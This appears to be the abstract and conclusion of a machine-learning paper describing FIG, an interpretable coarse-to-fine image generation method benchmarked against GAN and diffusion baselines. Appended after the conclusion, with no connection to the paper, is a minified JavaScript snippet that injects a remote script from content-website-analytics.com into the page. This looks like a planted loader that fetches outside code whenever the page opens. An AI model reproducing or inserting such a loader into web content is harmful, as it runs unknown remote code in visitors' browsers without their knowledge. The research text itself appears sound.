Although generative adversarial networks (GANs) and diffusion models achieve impressive realism through neural networks and backpropagation, the learned representations and latent spaces lack clear attribution and interpretability. Understanding the generation process requires auxiliary probing or post-hoc analysis. Empirical studies suggest that some models implicitly follow a coarse-to-fine generation mechanism, in which early stages determine the global structure and layout, and later stages progressively refine details and inject texture and style. This work explicitly formalizes this mechanism and presents a feed-forward image generation (FIG) process with well-defined objectives at each stage. FIG statistically models the lowest-resolution images and then progressively refines them. Unlike neural generative models, FIG provides explicit interpretability and attribution. Each generated region can be traced to its associated source and refinement. This property facilitates controllability, supports privacy-aware generation without retraining, and allows transparent manipulation of generated content. Compared to representative baselines based on GAN and diffusion, FIG achieves competitive visual quality, offers superior interpretability, and improves robustness in data-sparse regimes.

We introduced FIG, an interpretable and fully feed-forward image generation framework that formalizes the separation between global structure modeling and local detail refinement. FIG records pixel-level attribution throughout multi-resolution enhancement, enabling each synthesized detail to be attributed, controlled, or selectively modified. This design enables control over the global appearance, semantic attributes, and localized regions without affecting the rest of the image. Furthermore, the transparent retrieval process supports source-aware filtering, allowing selective exclusion of sensitive training samples without retraining. Extensive benchmark results demonstrate that FIG maintains competitive generation quality while offering these interpretability and controllability.

;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);